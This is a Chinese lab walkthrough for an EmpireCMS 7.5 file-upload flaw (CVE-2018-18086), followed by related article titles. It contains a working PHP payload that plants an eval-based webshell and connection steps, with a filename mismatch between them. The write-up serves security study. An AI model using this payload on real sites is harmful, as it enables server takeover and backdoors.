empirecms 文件上传 (CVE-2018-18086)
一、漏洞描述
EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件。
二、影响版本
EmpireCMS<=7.5
三、漏洞复现
- 进入靶场,登入后台 http://ip/empirecms/e/admin/,账号/密码:admin/123456。
系统->管理数据表->导入系统模型
2.上传*.php.mod文件,填写空格内容,选择马上导入,并确认:
<?php file_put_contents("sh3ll.php","<?php @eval(\$_POST[cmd]); ?>");?>
3.访问下看有没有成功解析
4.webshell管理工具连接http://ip/empirecms/e/admin/shell.php 密码cmd。
5.获取flag
empirecms 文件上传 (CVE-2018-18086)相关推荐
- 帝国cms empirecms 文件上传 (CVE-2018-18086)复现
所有文章,仅供安全研究与学习之用,后果自负! 这里写目录标题 empirecms 文件上传 (CVE-2018-18086) 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 0x04 漏洞 ...
- empirecms 文件上传 (CVE-2018-18086)漏洞复现
1.漏洞详情 EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS). EmpireCMS 7.5版本中的e/class/moddofun.php文件的'LoadInMod'函数存在安全漏 ...
- php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞
事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...
- java使用Jsch实现远程操作linux服务器进行文件上传、下载,删除和显示目录信息...
1.java使用Jsch实现远程操作linux服务器进行文件上传.下载,删除和显示目录信息. 参考链接:https://www.cnblogs.com/longyg/archive/2012/06/2 ...
- 使用FUSE挖掘文件上传漏洞
关于FUSE FUSE是一款功能强大的渗透测试安全工具,可以帮助广大研究人员在最短的时间内迅速寻找出目标软件系统中存在的文件上传漏洞. FUSE本质上是一个渗透测试系统,主要功能就是识别无限制可执行文 ...
- Ajax(form表单文件上传、请求头之contentType、Ajax传递json数据、Ajax文件上传)
form表单文件上传 上菜 file_put.html <form action="" method="post" enctype="multi ...
- [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- servlet实现文件上传,预览,下载和删除
一.准备工作 1.1 文件上传插件:uploadify: 1.2 文件上传所需jar包:commons-fileupload-1.3.1.jar和commons-io-2.2.jar 1.3 将数据转 ...
- HTML文件上传与下载
文件下载 传统的文件下载有两种方法: 使用<a/>标签,href属性直接连接到服务器的文件路径 window.location.href="url" 这两种方法效果一样 ...
最新文章
- Python和xml简介
- 去掉数组最后一个元素_leetcode 34. 在排序数组中查找元素的第一个和最后一个位置每天刷一道leetcode算法系列!...
- 我的世界末日求生系列服务器,末日生存 少年pi
- 解析几何复习(一)向量代数
- linux 网卡命令 mtu,Linux网络命令
- 训练网络时如何加入噪声_[模型量化] 如何训练一个“耐量化”的网络?
- no symbol version section for versioned symbol `memcpy@GLIBC_2.4'
- 每日工作记录——状态机的编码选择
- 百度智能云开物凭什么在“双跨”新增名单中排名榜首?
- 专访探索AGI的孤勇者,传奇工程师John Carmack:惊讶看不到如我这样的人
- 为什么要做特征归一化/标准化?
- 如何极速盘点海量固定资产?
- [Mysql] CONCAT函数 | CONCAT_WS函数
- Mac 配置教程-日常篇
- windows arm linux,Windows服务器搭载ARM,人生大赢家不是微软而是Linux
- 萝莉状态栏android4.4,教你如何让Windows 7任务栏功能更丰富
- 邀请媒体参加活动的邀请函应该怎么写
- 康奈尔大学计算机科学研究生,美国研究生留学 康奈尔大学计算机科学申请要求...
- 游戏FreeType字体
- 自动化实现携程预约抢票